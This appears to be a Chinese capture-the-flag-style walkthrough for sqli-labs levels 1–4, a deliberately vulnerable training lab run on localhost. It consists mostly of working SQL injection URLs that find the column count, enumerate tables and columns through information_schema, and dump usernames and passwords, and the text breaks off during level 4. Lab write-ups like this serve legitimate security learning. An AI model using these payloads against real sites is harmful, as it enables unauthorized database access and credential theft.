sqli-labs靶场通关攻略 1-5

标签：127.0 http 攻略 Less 0.1 labs sqli --+ id

通过https://github.com/Audi-1/sqli-labs 下载sqli-labs靶场压缩包

把靶场环境放入phpstudy_pro的www里面

输入数据库密码

使用php5.4.45nts版本

输入127.0.0.1点击setup

靶场建立

第一关：less-1

步骤一：根据提示确立攻击点，确定注入参数为id

步骤二：判断闭合方式：id=1' --+

步骤三：判断字段列数 order by

http://127.0.0.1/Less-1/?id=1' order by 1 --+ 页面正常说明存在1列

http://127.0.0.1/Less-1/?id=1' order by 2 --+ 页面正常说明存在2列

http://127.0.0.1/Less-1/?id=1' order by 3 --+ 页面正常说明存在3列

http://127.0.0.1/Less-1/?id=1' order by 4 --+ 页面不正常说明存在3列

步骤四：联合查询查当前数据库名数据库用户http://127.0.0.1/Less-1/?id=-1' union select 1,database(),3 --+

步骤五：联合查询查出网站的数据库里面的所有表名

http://127.0.0.1/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤六：联合查询查出users表里面的所有列

http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤七：查询表中所有的数据

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(id,username,password) from users --+

第二关 less-2

步骤一：判断闭合方式 id=1 --+

步骤二：判断字段列数 order by

http://127.0.0.1/Less-2/?id=1 order by 1 --+ 页面正常说明存在1列

http://127.0.0.1/Less-2/?id=1 order by 2 --+ 页面正常说明存在2列

http://127.0.0.1/Less-2/?id=1 order by 3 --+ 页面正常说明存在3列

http://127.0.0.1/Less-2/?id=1 order by 4 --+ 页面不正常说明存在3列

步骤三：联合查询查当前数据库名数据库用户http://127.0.0.1/Less-2/?id=-1 union select 1,database(),3 --+

步骤四：联合查询查出网站的数据库里面的所有表名

http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤五：联合查询查出users表里面的所有列

http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤六：查询表中所有的数据

http://127.0.0.1/Less-2/?id=-1 union select 1,2,group_concat(id,username,password) from users --+

第三关 less-3

步骤一：判断闭合方式 id=1') --+

步骤二：判断字段列数 order by

http://127.0.0.1/Less-3/?id=1') order by 1 --+ 页面正常说明存在1列

http://127.0.0.1/Less-3/?id=1') order by 2 --+ 页面正常说明存在2列

http://127.0.0.1/Less-3/?id=1') order by 3 --+ 页面正常说明存在3列

http://127.0.0.1/Less-3/?id=1') order by 4 --+ 页面不正常说明存在3列

步骤三：联合查询查当前数据库名数据库用户http://127.0.0.1/Less-3/?id=-1') union select 1,database(),3 --+

步骤四：联合查询查出网站的数据库里面的所有表名

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤五：联合查询查出users表里面的所有列

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤六：查询表中所有的数据

http://127.0.0.1/Less-3/?id=-1') union select 1,2,group_concat(id,username,password) from users --+

第四关 less-4

步骤一：判断闭合方式 id=1") --+

步骤二：判断字段列数 order by

http://127.0.0.1/Less-4/?id=1") order by 1 --+ 页面正常说明存在1列

http://127.0.0.1/Less-4/?id=1") order by 2 --+ 页面正常说明存在2列

http://127.0.0.1/Less-4/?id=1") order by 3 --+ 页面正常说明存在3列

http://127.0.0.1/Less-4/?id=1") order by 4 --+ 页面不正常说明存在3列

步骤三：联合查询查当前数据库名数据库用户http://127.0.0.1/Less-4/?id=-1") union select 1,database(),3 --+

步骤四：联合查询查出网站的数据库里面的所有表名

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤五：联合查询查出users表里面的所有列

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+